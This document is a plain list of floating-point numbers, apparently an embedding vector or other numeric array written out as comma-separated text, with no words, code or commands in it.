-0.011246849782764912, 0.034587714821100235, -0.05635109916329384, -0.0051925391890108585, 0.018812911584973335, -0.006547273136675358, -0.0026273077819496393, -0.020448816940188408, 0.02133980207145214, -0.02497676946222782, -0.008698050864040852, 0.019484801217913628, 0.028044091537594795, 0.011319881305098534, 0.025356533005833626, 0.033828187733888626, 0.03163724020123482, 0.057169049978256226, -0.03131590411067009, 0.012437262572348118, -0.010823266580700874, -0.016563542187213898, -0.010129467584192753, 0.019820746034383774, 0.008420530706644058, 0.023180194199085236, -0.011341790668666363, 0.0029322144109755754, -0.01865224353969097, -0.0018193969735875726, 0.03610676899552345, -0.01349621918052435, -0.023165589198470116, -0.017659014090895653, 0.02382287196815014, -0.004443966317921877, 0.016607360914349556, 0.004060551058501005, -0.017527557909488678, -0.015628738328814507, -0.012349625118076801, 0.038005586713552475, -0.015409644693136215, 0.006101781036704779, -0.0259407851845026, 0.00124518689699471, -0.01871066726744175, 0.02578011527657509, -0.011736160144209862, -0.015380431897938251, 0.02133980207145214, -0.02233302965760231, -0.02068251743912697, -0.03964149206876755, 0.023194801062345505, 0.05640952289104462, -0.0021051326766610146, -0.05658479779958725, 0.011283365078270435, -0.059593696147203445, -0.01745452545583248, -0.006386603694409132, -0.029942911118268967, -0.0358438566327095, 0.005524832289665937, -0.02015669085085392, -0.059330783784389496, -0.031432755291461945, 0.025546414777636528, 0.04051787033677101, -0.019294919446110725, 0.007346967700868845, -0.00393639737740159, -0.0019298571860417724, 0.012904664501547813, 0.012451869435608387, -0.006510757375508547, 0.018316296860575676, 0.00835480261594057, 0.027080075815320015, -0.0003188280970789492, 0.0008503604331053793, 0.01321869995445013, 6.45444345082069e-7, -0.0008352976874448359, 0.05532865598797798, -0.05781172960996628, -0.04002125561237335, -0.022771218791604042, 0.0064705898985266685, 0.0020193206146359444, -0.00704753864556551, -0.054773617535829544, 0.02401275373995304, 0.02523968368768692, 0.00958903506398201, -0.037246059626340866, 0.03762582316994667, 0.006780974101275206, -0.03709999844431877, -0.005090294871479273, -0.04174479842185974, 0.025049801915884018, -0.027036257088184357, 0.004911367781460285, -0.027313778176903725, -0.03368212282657623, 0.01264905370771885, 0.020711731165647507, 0.01726464368402958, 0.011480550281703472, -0.037012360990047455, -0.00823795236647129, 0.01673881709575653, -0.035551730543375015, 0.021412832662463188, 0.012955786660313606, -0.02182180993258953, 0.004140885546803474, 0.0037465153727680445, -0.022975707426667213, -0.018301691859960556, 0.0010991239687427878, -0.032922595739364624, -0.04294251650571823, -0.01989377848803997, 0.013189487159252167, -0.00934072770178318, -0.014299565926194191, 0.014986061491072178, -0.014847301878035069, -0.024874525144696236, -0.007215511053800583, -0.0008672489202581346, -0.02788342349231243, -0.008018857799470425, 0.025385746732354164, -0.011626613326370716, -0.06327448040246964, 0.0427672415971756, 0.0688248798251152, 0.029782241210341454, -0.017147794365882874, 0.00007679717964492738, -0.02256673015654087, 0.040868423879146576, 0.018111810088157654, 0.02185102179646492, -0.034091100096702576, -0.03055637516081333, -0.006342784967273474, -0.008866023272275925, -0.008537380956113338, 0.00801155436784029, -0.016432086005806923, 0.010348562151193619, -0.01871066726744175, -0.0028007577639073133, 0.026057636365294456, 0.02453858032822609, 0.021485865116119385, -0.03309787064790726, -0.02938787080347538, 0.009676672518253326, 0.06537778675556183, 0.011743463575839996, -0.021515076979994774, -0.007226466201245785, -0.018506180495023727, -0.00787279475480318, -0.004761653020977974, -0.004228523466736078, 0.014387203380465508, -0.007639093790203333, -0.02791263535618782, -0.00874917209148407, 0.00605796230956912, -0.06590361893177032, 0.033127084374427795, -0.0053422534838318825, 0.032396767288446426, -0.026174485683441162, 0.023107163608074188, 0.03137432783842087, 0.024217242375016212, 0.0026711267419159412, 0.01944098249077797, -0.023472320288419724, -0.01846235990524292, 0.010239015333354473, 0.020521849393844604, 0.01519055012613535, 0.004688621498644352, 0.00401308061555028, -0.007288542576134205, -0.028599131852388382, 0.012094015255570412, 0.04180322587490082, -0.022625155746936798, -0.004513346124440432, -0.019791534170508385, -0.014029349200427532, -0.009983404539525509, -0.019514014944434166, 0.03336078301072121, 0.00825986173003912, -0.015248974785208702, -0.04005046933889389, -0.027386808767914772, 0.010852479375898838, -0.005868080072104931, 0.01670960523188114, 0.003604104043915868, -0.01847696676850319, 0.04764574393630028, 0.003125747898593545, 0.008522775024175644, -0.012780510820448399, -0.024144209921360016, -0.04749968275427818, 0.02255212515592575, 0.004604635294526815, 0.006810186430811882, -0.020025234669446945, -0.006419468205422163, 0.00033868354512378573, -0.0014232011744752526, -0.027489053085446358, 0.0026711267419159412, 0.002110610017552972, 0.002685733139514923, -0.011969861574470997, -0.020302753895521164, 0.027562083676457405, 0.032922595739364624, 0.01653433032333851, -0.018287084996700287, -0.03157881647348404, 0.009683975949883461, 0.005718365777283907, -0.02161732129752636, -0.0006403948646038771, -0.07046078145503998, 0.023968935012817383, 0.004827381577342749, -0.037976376712322235, 0.007080403156578541, -0.013430491089820862, -0.01726464368402958, 0.037479761987924576, 0.017352283000946045, -0.007704822346568108, -0.022668974474072456, -0.030790075659751892, 0.030673226341605186, 0.03806401416659355, 0.0047360919415950775, -0.0049551865085959435, -0.009377242997288704, -0.022040903568267822, -0.016797242686152458, -0.025561021640896797, 0.016461297869682312, 0.007343316450715065, 0.05751960352063179, 0.0013309989590197802, -0.004334419034421444, -0.03914487734436989, 0.04340991750359535, 0.0046959249302744865, -0.006036052480340004, 0.01966007798910141, 0.027021652087569237, -0.014796179719269276, 0.01517594326287508, -0.007748641073703766, 0.012846238911151886, -0.019119644537568092, 0.019762320443987846, 0.027751965448260307, 0.029782241210341454, -0.03374055027961731, -0.006813838146626949, -0.020258935168385506, 0.002994291018694639, -0.012261987663805485, -0.008347499184310436, -0.023852083832025528, 0.032425981014966965, -0.0012041067238897085, 0.008873325772583485, 0.01248838473111391, 0.01517594326287508, 0.004684970248490572, -0.0032261661253869534, -0.03528881445527077, -0.006499802693724632, -0.03707078471779823, 0.04808393493294716, -0.03867747634649277, 0.023107163608074188, 0.031461965292692184, -0.0076098814606666565, 0.02256673015654087, -0.029271021485328674, -0.021485865116119385, 0.006970855873078108, -0.02791263535618782, -0.004794517531991005, -0.018345510587096214, -0.021938659250736237, 0.04072235897183418, -0.017542164772748947, -0.025108225643634796, 0.014745057560503483, -0.008924447931349277, -0.03622362017631531, 0.011568187735974789, -0.026641888543963432, 0.015716377645730972, -0.010450806468725204, 0.0070037199184298515, -0.004630196373909712, 0.005798700265586376, 0.0163006279617548, 0.022771218791604042, -0.004593680612742901, 0.001991933910176158, 0.0315496027469635, 0.06391716003417969, -0.02282964438199997, 0.009866554290056229, -0.00009146053344011307, 0.01191143598407507, -0.009946889244019985, -0.029533933848142624, 0.04098527133464813, 0.009998011402785778, 0.02548799104988575, -0.011758069507777691, 0.028540706261992455, -0.010341258719563484, 0.03791794925928116, 0.01264175120741129, -0.008559290319681168, 0.016461297869682312, -0.005605166777968407, 0.008968266658484936, 0.04828841984272003, -0.0017418010393157601, 0.01420462504029274, 0.029022714123129845, -0.031432755291461945, -0.005353208165615797, 0.015599526464939117, -0.013569250702857971, 0.05120968073606491, -0.005510225892066956, 0.00812840461730957, -0.008807597681879997, -0.06000267341732979, 0.004674015566706657, -0.014241140335798264, -0.008654231205582619, 0.016344446688890457, 0.019470196217298508, 0.03958306834101677, 0.0009096984867937863, -0.019309526309370995, -0.021222950890660286, -0.01672421209514141, -0.032367557287216187, 0.007865491323173046, -0.01225468423217535, -0.00011833383905468509, -0.01542425062507391, -0.0013008734676986933, 0.022479092702269554, 0.03841456398367882, 0.006518060341477394, 0.047967083752155304, -0.023998146876692772, -0.006897824350744486, 0.0379471629858017, 0.021442046388983727, 0.008654231205582619, 0.0075368499383330345, 0.03733369708061218, 0.04416944459080696, -0.012882755137979984, -0.002497676992788911, -0.02355995960533619, -0.014168108813464642, -0.004027686547487974, 0.0014095078222453594, 0.02548799104988575, -0.030147399753332138, -0.010049132630228996, 0.007007371634244919, -0.0007960432558320463, 0.028555313125252724, -0.01917807012796402, -0.005046476144343615, 0.004261387512087822, -0.0014898424269631505, 0.008091889321804047, -0.014715845696628094, -0.02158810943365097, 0.0026181789580732584, -0.01945558935403824, -0.0011246849317103624, -0.025561021640896797, 0.016607360914349556, 0.029694603756070137, 0.022961100563406944, 0.020288148894906044, -0.006572834216058254, -0.004089763388037682, 0.03108220174908638, 0.04244590178132057, -0.020521849393844604, 0.04475369676947594, 0.028526099398732185, 0.04633117839694023, 0.008296377025544643, -0.007325058337301016, -0.005864428821951151, 0.02500598318874836, 0.014007439836859703, -0.031169839203357697, -0.03432479873299599, -0.019309526309370995, 0.02205551043152809, -0.027109289541840553, 0.01917807012796402, -0.0058790347538888454, 0.007281239610165358, 0.020288148894906044, -0.016373660415410995, 0.02500598318874836, 0.005871731787919998, -0.01993759721517563, 0.004078808706253767, -0.007850885391235352, 0.013875982724130154, -0.010852479375898838, -0.012313108891248703, 0.011809191666543484, 0.009019388817250729, -0.00012552287080325186, 0.026043029502034187, -0.028701376169919968, -0.03590228036046028, -0.028949683532118797, -0.016183778643608093, 0.0065436214208602905, 0.0017892714822664857, 0.021003857254981995, 0.020054446533322334, -0.021675746887922287, 0.014314171858131886, -0.03610676899552345, -0.011706948280334473, 0.02285885624587536, -0.000586077687330544, -0.028453068807721138, -0.012860845774412155, -0.02011287212371826, 0.0033868353348225355, 0.01555570773780346, -0.00021555701096076518, -0.008661534637212753, 0.01420462504029274, -0.008551987819373608, -0.001991933910176158, -0.0018257872434332967, -0.02284424938261509, -0.0037611217703670263, 0.0036935675889253616, -0.017571376636624336, 0.0017536686500534415, 0.005240009631961584, 0.03444164991378784, 0.01917807012796402, -0.011816495098173618, -0.0081503139808774, 0.010436199605464935, 0.026656493544578552, -0.01647590473294258, 0.015102912671864033, 0.0029322144109755754, 0.010823266580700874, -0.013087242841720581, 0.009180058725178242, 0.005364162847399712, 0.006412164773792028, 0.011853011325001717, 0.022888069972395897, 0.0033941385336220264, -0.006244192365556955, 0.02354535274207592, 0.008069979958236217, -0.003947352059185505, -0.025152044370770454, 0.0019316829275339842, 0.008639625273644924, -0.007960432209074497, -0.009296908974647522, 0.003742863889783621, -0.02767893485724926, 0.029709210619330406, -0.007624487392604351, -0.017805077135562897, -0.034120313823223114, 0.008384015411138535, 0.012152439914643764, 0.010100254788994789, 0.01347430981695652, -0.020448816940188408, 0.009552518837153912, -0.009924979880452156, -0.028701376169919968, -0.03423716127872467, 0.035084329545497894, 0.011779979802668095, -0.009318818338215351, -0.03864826634526253, -0.009815432131290436, 0.05243660882115364, 0.003257204545661807, -0.001991933910176158, 0.03301023319363594, 0.012670964002609253, 0.008230648934841156, -0.028482280671596527, 0.022274604067206383, -0.005988582037389278, -0.01865224353969097, -0.027737360447645187, -0.00631357217207551, 0.03537645563483238, -0.00824525486677885, 0.00020779740589205176, -0.004480482079088688, -0.016329841688275337, -0.011568187735974789, 0.024859920144081116, 0.010633384808897972, -0.008099191822111607, 0.006094478070735931, 0.02380826510488987, -0.002298666164278984, -0.026378974318504333, 0.022625155746936798, 0.015438857488334179, 0.006529015023261309, 0.013196790590882301, 0.01869606226682663, -0.00911432970315218, 0.023837478831410408, -0.017396101728081703, -0.025122832506895065, -0.022435273975133896, -0.028014879673719406, -0.0049150194972753525, -0.038502201437950134, 0.014986061491072178, -0.008157617412507534, 0.012086711823940277, -0.028511494398117065, 0.024611612781882286, 0.021033069118857384, -0.009406455792486668, 0.014357990585267544, -0.0034306542947888374, 0.007675609551370144, -0.02940247766673565, -0.03561015427112579, 0.001178545644506812, -0.013313640840351582, -0.009012086316943169, 0.038239289075136185, 0.06233967840671539, 0.008340195752680302, 0.0007202730630524457, -0.017396101728081703, 0.01264175120741129, 0.0029541237745434046, 0.010764841921627522, 0.007306800689548254, -0.02376444637775421, 0.007372528780251741, 0.02743062749505043, 0.028803620487451553, -0.018491573631763458, 0.03108220174908638, -0.012831632979214191, -0.018155628815293312, -0.04825920984148979, 0.002313272561877966, -0.023165589198470116, -0.028350824490189552, -0.021909447386860847, 0.0358438566327095, -0.0023004920221865177, 0.01725003868341446, 0.013145668432116508, -0.0023625686299055815, -0.02624751813709736, 0.01627141609787941, -0.013649585656821728, 0.005247312597930431, -0.0017518429085612297, -0.023852083832025528, -0.010136771015822887, 0.009903070516884327, -0.01554110087454319, -0.010151376947760582, -0.0354640930891037, 0.015526494942605495, -0.021924054250121117, -0.000805172196123749, 0.00861041247844696, -0.010962027125060558, -0.01177267637103796, 0.006981810554862022, -0.0014624556060880423, -0.00909242033958435, -0.000952148053329438, 0.00727393664419651, 0.015453463420271873, -0.011699644848704338, 0.007343316450715065, 0.025590233504772186, -0.02161732129752636, 0.00970588531345129, -0.00936263706535101, 0.003317455528303981, 0.0213836207985878, -0.01275860145688057, 0.014116986654698849, 0.022946493700146675, 0.019776927307248116, -0.04320542886853218, -0.011612007394433022, -0.005477361846715212, -0.03283495828509331, -0.060061097145080566, 0.0023461366072297096, 0.003896229900419712, 0.03175409138202667, -0.022742006927728653, -0.00435998011380434, -0.03371133655309677, -0.010735629126429558, 0.005893641151487827, -0.028496887534856796, -0.011224940419197083, -0.017863502725958824, 0.01117381826043129, 0.03374055027961731, -0.022259999066591263, -0.0028829181101173162, 0.002137996954843402, -0.016651179641485214, -0.02062409371137619, 0.009041298180818558, -0.007157085929065943, 0.005703759379684925, -0.028935076668858528, -0.04250432923436165, -0.005316692404448986, 0.0020302755292505026, 0.019996022805571556, -0.008310983888804913, 0.032396767288446426, 0.006897824350744486, 0.008040767163038254, -0.010494625195860863, 0.016096141189336777, -0.011575491167604923, -0.02017129771411419, -0.0013337376294657588, -0.0164905097335577, -0.0023863038513809443, -0.007346967700868845, 0.030497949570417404, -0.028818225488066673, 0.0009375417721457779, -0.02185102179646492, 0.02814633585512638, -0.0017974876100197434, 0.04922322556376457, -0.00376477325335145, 0.00012985912326257676, -0.014058561995625496, 0.015672557055950165, -0.03523039072751999, 0.011027755215764046, -0.0009192838915623724, -0.02113531343638897, -0.0033996158745139837, 0.009625550359487534, 0.025166651234030724, 0.02306334488093853, -0.045250311493873596, 0.03134511411190033, 0.017366888001561165, -0.026028422638773918, -0.00777785386890173, -0.004838336259126663, -0.004977095872163773, -0.0470614917576313, 0.0015172292478382587, 0.005393375642597675, 0.022289210930466652, -0.023472320288419724, 0.0028664860874414444, 0.0022457183804363012, 0.006521712057292461, 0.01625680923461914, -0.01056035328656435, -0.0004979834775440395, 0.01725003868341446, -0.043380703777074814, -0.007193601690232754, 0.02301952615380287, 0.01066990103572607, 0.011400215327739716, 0.003498208476230502, -0.007653700187802315, -0.03908645361661911, 0.00802616123110056, 0.03864826634526253, 0.0016806371277198195, -0.008194133639335632, 0.009508700110018253, 0.011371003463864326, 0.005407982040196657, 0.003317455528303981, -0.0048091234639286995, -0.01600850187242031, -0.024100391194224358, 0.03476298972964287, -0.010399684309959412, 0.015073699876666069, 0.031403541564941406, -0.019981415942311287, 0.05164787173271179, 0.018038777634501457, 0.024363305419683456, -0.024202635511755943, -0.018885944038629532, 0.01602310873568058, -0.03210464492440224, -0.0051596746779978275, -0.0024721159134060144, -0.0008978308760561049, -0.011831101030111313, 0.008639625273644924, -0.01894436776638031, -0.0014085948932915926, -0.013233305886387825, -0.00022685407020617276, 0.01313106156885624, 0.000952148053329438, -0.05144338309764862, 0.006945294793695211, 0.016388267278671265, -0.009691278450191021, 0.036019131541252136, 0.04151109978556633, 0.007211859803646803, -0.01446023490279913, -0.009326121769845486, -0.019105037674307823, 0.0067262002266943455, 0.003144005546346307, 0.024450942873954773, 0.013547341339290142, -0.027050863951444626, 0.002408213447779417, -0.0172062199562788, 0.006390255410224199, -0.008588503114879131, 0.03718763589859009, -0.007007371634244919, -0.013415885157883167, -0.04349755495786667, 0.006474241614341736, -0.000008387210073124152, -0.00557960569858551, -0.008281771093606949, -0.006459635216742754, -0.014613601379096508, -0.012685569934546947, -0.004721486009657383, 0.01005643606185913, 0.01455517578870058, -0.003852411173284054, 0.020069053396582603, 0.0012981347972527146, 0.003896229900419712, 0.0008791165892034769, -0.010516534559428692, 0.021222950890660286, -0.021237557753920555, 0.021777991205453873, -0.022026296705007553, 0.007441909052431583, -0.0018203099025413394, 0.004579074215143919, 0.009764309972524643, -0.03450007736682892, 0.02478688769042492, -0.011188424192368984, -0.016811849549412727, -0.02109149470925331, -0.02063869871199131, -0.004173749592155218, -0.028292398899793625, -0.024421731010079384, -0.01939716376364231, -0.032630469650030136, 0.014138896949589252, -0.0106918103992939, 0.013875982724130154, 0.007858188822865486, 0.08378172665834427, 0.0009375417721457779, 0.005470058415085077, -0.016212990507483482, -0.028467675670981407, 0.011699644848704338, 0.008573897182941437, 0.007306800689548254, -0.012444566003978252, -0.030936138704419136, 0.005700107663869858, 0.01795114018023014, -0.030439525842666626, 0.01285354234278202, 0.00424678111448884, 0.007617184426635504, -0.015964683145284653, -0.019849959760904312, 0.020594879984855652, -0.013437794521450996, 0.006529015023261309, 0.016461297869682312, -0.005163326393812895, 0.006134645082056522, 0.022888069972395897, 0.022435273975133896, 0.015102912671864033, -0.010983936488628387, -0.031169839203357697, 0.002145299920812249, 0.010253621265292168, -0.007493030745536089, -0.024377912282943726, -0.015935471281409264, -0.0018613900756463408, 0.012495688162744045, -0.0016066927928477526, 0.011276062577962875, -0.015263581648468971, -0.02255212515592575, -0.018287084996700287, -0.00667872978374362, -0.03149117901921272, 0.015117518603801727, 0.007763247471302748, 0.002651043003425002, 0.001089995028451085, 0.008347499184310436, -0.027299171313643456, 0.006916081998497248, -0.03856062516570091, -0.007953129708766937, -0.014562479220330715, 0.01055305078625679, 0.015482676215469837, 0.0006746284198015928, -0.02040499821305275, -0.02234763652086258, -0.040196530520915985, 0.008398621343076229, 0.01647590473294258, -0.004433011636137962, -0.01725003868341446, -0.003008897416293621, -0.029913699254393578, 0.00710231252014637, -0.029913699254393578, 0.006784625351428986, -0.019353345036506653, 0.025882359594106674, 0.023194801062345505, 0.01455517578870058, 0.014650116674602032, -0.0033813579939305782, -0.01250299159437418, -0.009033995680510998, -0.010874388739466667, 0.02745984122157097, -0.00486389733850956, -0.016183778643608093, -0.004754350055009127, 0.013021514751017094, 0.01966007798910141, 0.029197989031672478, 0.006609349977225065, 0.013664191588759422, -0.024407124146819115, -0.026013817638158798, 0.009355333633720875, 0.013423187658190727, -0.03198779374361038, 0.006160206161439419, 0.00018577385344542563, -0.014387203380465508, 0.02303413115441799, 0.0345585010945797, 0.00486389733850956, -0.0046594091691076756, -0.029066532850265503, 0.008807597681879997, 0.013510826043784618, 0.005020915064960718, -0.002320575527846813, -0.0010270053753629327, -0.01751295104622841, 0.000022508533220388927, -0.014635510742664337, -0.006280708126723766, -0.005258267279714346, 0.0005354121094569564, 0.008785688318312168, -0.00401673186570406, -0.016621967777609825, -0.0074638184159994125, -0.008405924774706364, -0.0047689564526081085, 0.0012324063573032618, 0.020200509577989578, 0.0012415352975949645, -0.02957775443792343, -0.019981415942311287, 0.006130993831902742, 0.010114861652255058, -0.019338738173246384, 0.02547338418662548, -0.0011219462612643838, 0.013919802382588387, -0.022230785340070724, 0.016402872279286385, 0.0036862643901258707, 0.004962489940226078, 0.008887932635843754, 0.016125353053212166, -0.01916346326470375, 0.005137765314429998, -0.001859564334154129, 0.01395631767809391, 0.015599526464939117, -0.03111141547560692, 0.013255215249955654, -0.001267096376977861, -0.011392912827432156, -0.0007677435642108321, 0.036311257630586624, 0.015877045691013336, 0.0029541237745434046, -0.01519055012613535, 0.012722085230052471, 0.02474306896328926, 0.015132124535739422, 0.01606692746281624, -0.014986061491072178, 0.008427834138274193, 0.03333157300949097, -0.006477893330156803, -0.013795648701488972, 0.016096141189336777, -0.026174485683441162, 0.0013383020414039493, 0.006112735718488693, -0.0006846702308394015, 0.009735098108649254, 0.020960038527846336, -0.01897358149290085, 0.0007554194889962673, 0.02332625724375248, -0.004002125468105078, 0.0035548077430576086, -0.03219228237867355, 0.013481613248586655, 0.021252164617180824, 0.010983936488628387, -0.015701770782470703, 0.0077194287441670895, 0.011721554212272167, 0.03160803020000458, -0.005338601768016815, -0.009296908974647522, 0.02522507682442665, -0.007175344042479992, 0.017103975638747215, 0.020478030666708946, 0.0021909447386860847, -0.008252558298408985, -0.01044350303709507, 0.01264905370771885, 0.0029376917518675327, 0.002526889555156231, -0.024377912282943726, -0.00048063849681057036, 0.028233973309397697, 0.02475767582654953, -0.017775865271687508, -0.028993502259254456, -0.015877045691013336, -0.022259999066591263, 0.013247912749648094, -0.027532871812582016, 0.020039841532707214, -0.02788342349231243, -0.021003857254981995, -0.02212854102253914, 0.023004919290542603, -0.0034671700559556484, -0.0005477361846715212, -0.04203692451119423, -0.009552518837153912, 0.014284959062933922, 0.02374984137713909, 0.016651179641485214, 0.0026035725604742765, -0.010107558220624924, 0.007821672596037388, -0.007120570167899132, 0.007551456335932016, -0.017060156911611557, -0.013569250702857971, -0.019747715443372726, -0.005711062345653772, -0.004801820497959852, -0.005075688473880291, -0.0004505130054894835, -0.004480482079088688, 0.015146731398999691, -0.016373660415410995, -0.013934408314526081, 0.011743463575839996, -0.019996022805571556, -0.009150845929980278, -0.005356859881430864, -0.03981676697731018, -0.00710231252014637, -0.00923117995262146, -0.0067992317490279675, -0.007938522845506668, -0.015409644693136215, 0.00020597162074409425, -0.007704822346568108, 0.004933277145028114, 0.015701770782470703, -0.0030034200754016638, -0.004849290940910578, -0.018769092857837677, -0.011013148352503777, 0.0014250269159674644, -0.0003350319748278707, 0.010969329625368118, 0.011706948280334473, 0.0028226671274751425, -0.00945757795125246, 0.004097066819667816, 0.008106495253741741, 0.0086031099781394, -0.014613601379096508, -0.019557833671569824, 0.0014515009243041277, 0.017863502725958824, -0.02282964438199997, -0.007204556372016668, -0.02062409371137619, 0.04834684729576111, -0.005685501731932163, -0.009048601612448692, 0.021252164617180824, -0.02303413115441799, 0.010290136560797691, -0.011312577873468399, -0.006656820420175791, -0.01798035204410553, 0.00625149579718709, -0.003852411173284054, -0.004586377646774054, 0.0076098814606666565, -0.01746913231909275, -0.01446023490279913, -0.015395037829875946, -0.002437426010146737, 0.0008174962713383138, -0.004436662886291742, 0.009683975949883461, 0.006707942578941584, 0.03838535025715828, 0.0025232380721718073, -0.012437262572348118, 0.003662529168650508, 0.006667775101959705, -0.02185102179646492, 0.013737223111093044, -0.01944098249077797, -0.02747444622218609, 0.011758069507777691, -0.002506805816665292, -0.0028098865877836943, -0.020755549892783165, 0.001053479267284274, 0.0023406592663377523, -0.004396495874971151, 0.023165589198470116, 0.02816094271838665, 0.018856730312108994, 0.001069911289960146, 0.02838003635406494, 0.007244723848998547, 0.006441377568989992, 0.001955418149009347, 0.0033357134088873863, -0.006594743579626083, -0.011882223188877106, -0.012349625118076801, 0.008573897182941437, -0.014949546195566654, 0.0037830311339348555, -0.02886204421520233, 0.009778916835784912, -0.0019864565692842007, -0.007617184426635504, -0.013547341339290142, 0.016373660415410995, -0.0032115597277879715, -0.00698546227067709, -0.005857125390321016, -0.0196892898529768, -0.030760863795876503, -0.002819015644490719, -0.015117518603801727, -0.0007503985543735325, -0.027050863951444626, 0.01796574704349041, -0.01118112076073885, -0.019105037674307823, 0.020083660259842873, 0.002114261733368039, 0.015219762921333313, 0.009501396678388119, -0.015438857488334179, 0.012576022185385227, 0.002504980191588402, 0.0017189787467941642, -0.012882755137979984, -0.0028664860874414444, -0.0170163381844759, 0.028526099398732185, -0.00850816909223795, -0.005002656951546669, 0.02205551043152809, 0.01152436900883913, 0.014233837835490704, -0.017045550048351288, -0.008595806546509266, -0.00936263706535101, -0.022040903568267822, 0.0015555707504972816, 0.0043088579550385475, 0.004349025432020426, 0.011232242919504642, 0.024962162598967552, -0.002256673062220216, -0.004089763388037682, 0.03303944692015648, -0.03008897416293621, -0.028233973309397697, 0.002923085354268551, -0.00956712570041418, -0.0046228934079408646, 0.006627607624977827, -0.02503519505262375, -0.01673881709575653, -0.0011694167042151093, 0.005141417030245066, 0.01237153448164463, -0.013079940341413021, 0.00257618585601449, 0.01057496014982462, 0.010640688240528107, 0.021222950890660286, 0.009501396678388119, 0.03303944692015648, -0.03376976028084755, -0.02132519520819187, 0.016461297869682312, -0.01409507729113102, 0.00006607067916775122, -0.019367951899766922, -0.025122832506895065, -0.020039841532707214, -0.02041960507631302, -0.015453463420271873, -0.0211207065731287, -0.012203562073409557, 0.004425708204507828, 0.01576019637286663, 0.00104708899743855, -0.0020613137166947126, 0.012291199527680874, -0.009180058725178242, 0.008917145431041718, -0.020229723304510117, 0.006288011092692614, -0.009267696179449558, 0.00010070357529912144, -0.00029486464336514473, -0.015920864418148994, 0.005331298802047968, 0.01846235990524292, 0.004192007705569267, 0.006594743579626083, -0.02889125794172287, -0.02547338418662548, 0.00577313918620348, -0.008449743501842022, 0.00897557009011507, -0.013656889088451862, -0.01824326626956463, -0.018856730312108994, -0.04346834123134613, 0.0034470863174647093, 0.012349625118076801, 0.04729519411921501, 0.031228264793753624, 0.0012625318486243486, 0.017863502725958824, -0.0044184052385389805, -0.003563936799764633, -0.035318028181791306, -0.01019519567489624, 0.000019127974155708216, -0.03327314555644989, 0.004370934795588255, -0.006445028819143772, 0.003207908244803548, 0.009968798607587814, 0.014832695946097374, 0.0007901094504632056, -0.008960964158177376, 0.02353074587881565, -0.0020978294778615236, -0.005166978109627962, 0.006817489396780729, -0.011239546351134777, 0.004984399303793907, -0.012042893096804619, -0.006773670669645071, -0.00142867851536721, -0.0031531346030533314, 0.0032918944489210844, 0.008442440070211887, -0.031666453927755356, 0.022712793201208115, -0.002952297916635871, 0.0036497486289590597, 0.023881297558546066, 0.0015053616371005774, 0.025882359594106674, 0.01517594326287508, -0.011129999533295631, -0.004597332328557968, -0.002599921077489853, -0.014241140335798264, 0.007000068202614784, -0.015234368853271008, 0.03058558888733387, -0.002506805816665292, 0.006094478070735931, -0.01164121925830841, 0.02188023366034031, -0.006751761306077242, 0.018024172633886337, -0.007748641073703766, -0.020930824801325798, -0.0016386440256610513, 0.012977696023881435, -0.01695791259407997, -0.000289387273369357, 0.011553581804037094, 0.006350087933242321, 0.0030472390353679657, -0.024202635511755943, -0.008267165161669254, 0.015044487081468105, 0.0020302755292505026, 0.014913029968738556, 0.03222149237990379, -0.001603041193448007, -0.008091889321804047, 0.008194133639335632, -0.0011666780337691307, -0.005809654947370291, -0.019966809079051018, 0.0007220988627523184, -0.014679329469799995, -0.009172755293548107, -0.015263581648468971, -0.0045316037721931934, -0.009625550359487534, 0.016680391505360603, 0.01115921139717102, -0.0026839072816073895, 0.031403541564941406, 0.017790470272302628, -0.007460166700184345, -0.003881623735651374, -0.002393607050180435, -0.011838404461741447, -0.008763778954744339, 0.006200373638421297, -0.0013465180527418852, -0.0012871799990534782, 0.007828976027667522, 0.0070767514407634735, -0.014328778721392155, 0.0031129673589020967, 0.006404861807823181, -0.005400678608566523, 0.016344446688890457, 0.0031312252394855022, 0.007741338107734919, 0.013671495020389557, -0.011327183805406094, -0.024436336010694504, -0.0016632921760901809, -0.01324060931801796, -0.001479800557717681, 0.0042358264327049255, -0.01843314804136753, -0.016811849549412727, 0.001376643544062972, 0.01406586542725563, -0.004078808706253767, -0.016183778643608093, 0.004319812636822462, -0.004465875681489706, -0.005535786971449852, -0.007430954370647669, -0.013386672362685204, 0.014423719607293606, -0.004758001770824194, 0.022172359749674797, -0.006269753444939852, 0.016461297869682312, -0.0024191681295633316, -0.006280708126723766, -0.005353208165615797, 0.005963020958006382, 0.0019736760295927525, 0.003105664160102606, 0.001010573236271739, 0.007697518914937973, -0.012495688162744045, -0.025195864960551262, 0.019718501716852188, 0.0049186707474291325, 0.0038852752186357975, -0.0034069190733134747, 0.013284428045153618, -0.007204556372016668, 0.0015765673015266657, -0.0061894189566373825, 0.017191613093018532, -0.012203562073409557, -0.009581731632351875, -0.005024566315114498, 0.021792596206068993, 0.0014880165690556169, -0.00007303149322979152, 0.00851547159254551, 0.008551987819373608, 0.0027989319059997797, -0.01916346326470375, 0.01600850187242031, -0.03137432783842087, 0.015453463420271873, 0.013912498950958252, 0.0025907920207828283, 0.006218631286174059, 0.012890057638287544, 0.00024511193623766303, -0.00040418366552330554, 0.0050866431556642056, -0.004754350055009127, -0.004469527397304773, 0.008530078455805779, 0.01602310873568058, 0.002674778224900365, -0.0315496027469635, -0.016315234825015068, 0.004524300806224346, -0.011940648779273033, 0.006269753444939852, -0.008763778954744339, 0.000006315369773801649, 0.00777785386890173, -0.00789470411837101, -0.009859250858426094, 0.03131590411067009, -0.017381494864821434, -0.010764841921627522, -0.02066791243851185, -0.0009603641228750348, -0.003587672021239996, 0.017863502725958824, 0.0072958460077643394, -0.00024054746609181166, 0.009946889244019985, -0.0005915550864301622, -0.018126415088772774, 0.004571771249175072, 0.0020594880916178226, -0.005652637220919132, 0.0009704059339128435, 0.01722082495689392, 0.01225468423217535, -0.0037611217703670263, -0.005240009631961584, -0.005364162847399712, -0.01581862010061741, -0.012678266502916813, -0.021792596206068993, -0.01468663290143013, -0.012941179797053337, -0.022727400064468384, 0.012984998524188995, -0.011239546351134777, -0.0022073767613619566, -0.001853174064308405, -0.001426852773874998, 0.0018130067037418485, -0.004860245622694492, -0.00662030465900898, -0.0011876745847985148, 0.009143542498350143, -0.0027405067812651396, -0.00673715490847826, 0.007989645004272461, -0.005261918995529413, -0.002629133639857173, 0.01914885640144348, -0.009150845929980278, 0.008939054794609547, -0.021661140024662018, -0.014956849627196789, 0.009808128699660301, -0.022479092702269554, -0.027605904266238213, -0.014956849627196789, -0.0016660308465361595, 0.003954655025154352, 0.011239546351134777, 0.009450274519622326, 0.013372065499424934, 0.015614132396876812, -0.0230779517441988, 0.01118112076073885, 